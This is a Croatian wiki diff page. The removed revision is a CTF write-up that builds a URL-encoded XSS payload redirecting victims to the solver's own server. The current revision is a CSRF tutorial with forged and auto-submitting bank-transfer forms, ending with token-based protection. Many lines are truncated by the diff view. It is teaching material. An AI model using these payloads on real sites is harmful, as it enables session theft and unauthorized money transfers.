csrf
Differences
This shows you the differences between two versions of the page.
| Next revision | Previous revision | ||
| csrf [2023/11/21 13:45] – created zrinka | csrf [2025/12/01 11:40] (current) – external edit 127.0.0.1 | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | __PRIMJER__ -**Zadatak s Hacknite platforme - Korisni linkovi** | + | ====CSRF===== |
| - | < | + | |
| - | Kako bi olakšao učenje sebi i svojim prijateljima, | + | |
| - | linkova. On i njegovi prijatelji si mogu slati linkove zanimljivih članaka, tutoriala ili slično. | + | |
| - | Iako vjeruje svojim prijateljima, | + | **CSRF** (//Cross site request forgery//) je vrsta napada koja iskorištava ranjivost nastalu zbog nerazlikovanja autentičnih zahtjeva korisnika |
| - | Mario se ulogira na stranicu svojim korisničkim imenom ' | + | |
| - | što ode na njega i provjeri na koju stranicu link vodi. To ipak može potrajati nekoliko sekundi, | + | |
| - | jer Mario voli detaljnije proučiti stranicu na kojoj se nalazi. | + | |
| - | Početkom nove akademske godine, odlučio je proširiti stranicu, i sad je i drugi ljudi mogu koristiti. | + | Zamislimo da se na adresi < |
| - | Mario ti je odlučio dati pristup stranici. Možeš | + | |
| - | Osim toga, odlučio ti je dati i source kod stranice na kojoj provjerava linkove tako da bi mogao vidjeti | + | |
| - | na koji on to točno radi. | + | |
| - | Flag je u formatu CTF2021[brojevi] | + | < |
| + | šalje količinu novaca u parametru //amount// s računa korisnika koji je napravio taj zahtjev na račun korisnika s korisničkim računom // | ||
| + | |||
| + | Napadač može prilagoditi parametre //amount// i //to// u URL-u i poslati takav link žrtvi. Klikom na link, žrtva bi poslala novce napadaču. | ||
| + | |||
| + | Napad bi potencijalno bio moguć i da funkcionalnost koristi POST zahtjev. Pretpostavimo da bankarska aplikacija koristi formu sljedećeg izgleda: | ||
| + | |||
| + | <code html> | ||
| + | |||
| + | <form action="/ | ||
| + | <label for=" | ||
| + | <input type=" | ||
| + | <label for=" | ||
| + | <input type=" | ||
| + | <input type=" | ||
| + | </ | ||
| - | http:// | ||
| - | </ | ||
| - | U prilogu se nalazi još jedna php datoteka.\\ | ||
| - | Ako pratimo poveznicu, dolazimo na početnu stranicu koja od nas traži registraciju. Nakon što su napravimo, došli smo do stranice gdje možemo odabrati osobu i link koji joj šaljemo. Primjećujemo mjesto za korisnički input koje, ako nema dobro riješeno pročišćavanje unosa, može biti potencijalno ranjivo. \\ | ||
| - | Budući da iskorištavamo XSS ranjivost, prvo ćemo napraviti svoju web stranicu sa IP adresom {// | ||
| - | < | ||
| - | [javascript] document.location=" | ||
| </ | </ | ||
| - | Budući da Marijeva stranica ne radi nikakvu provjeru predanih linkova, | + | |
| - | < | + | Zatim kreira svoju lažnu stranicu te na njoj postavi |
| - | http://ip_adresa_zadatka/ | + | < |
| - | </code> | + | <form action=" |
| - | Ovime smo kao //query// parameter unijeli skriptu koja prebacuje | + | <input type=" |
| - | %3C < \\ | + | <input type=" |
| - | %3E > \\ | + | <input type=" |
| - | %3D = \\ | + | </form> |
| - | %22 " | + | </code> |
| - | %3A : \\ | + | |
| - | %3F ? \\ | + | Kada bi žrtva posjetila napadačevu stranicu i pokušala se registrirati klikom na gumb REGISTER, poslala bi zahtjev POST prema < |
| - | %2F / \\ | + | |
| - | %3B ; \\ | + | No, slanje ovog zahtjeva je moguće automatizirati tako da ga žrtva pošalje samim posjetom stranice. Npr. dodavanjem funkcije submit u onload atribut u body elementu: |
| - | Kad prevedemo link na taj način, uočit ćemo da je isti kao onaj koji smo na početku upisali u svoju zlonamjernu stranicu. Ova naredba unutar < | + | |
| + | <code html> | ||
| + | <body onload="document.forms[0].submit()"> | ||
| + | < | ||
| + | ... | ||
| + | </form> | ||
| + | </ | ||
| + | </ | ||
| + | |||
| + | Ako je žrtva u trenutku kada posjeti napadačevu stranicu prijavljena u bankarsku aplikaciju i ako je ta aplikacija ranjiva na CSRF napade, novac bi se sa žrtvinog računa prebacio | ||
| + | |||
| + | Osnovni razlog za CSRF napade | ||
| + | |||
| + | Najbolja zaštita od ovakvih napada | ||
| + | u sjednicu korisnika svakim novim zahtjevom i imaju kratak period trajanja. Unutar svakog novog zahtjeva klijent šalje predani token natrag nakon čega poslužitelj provjerava njegovu validnost. Ako je vrijednost ispravna, zahtjev se izvršava | ||
| + | |||
| + | |||
| + | |||
csrf.1700574307.txt.gz · Last modified: 2025/12/01 11:40 (external edit)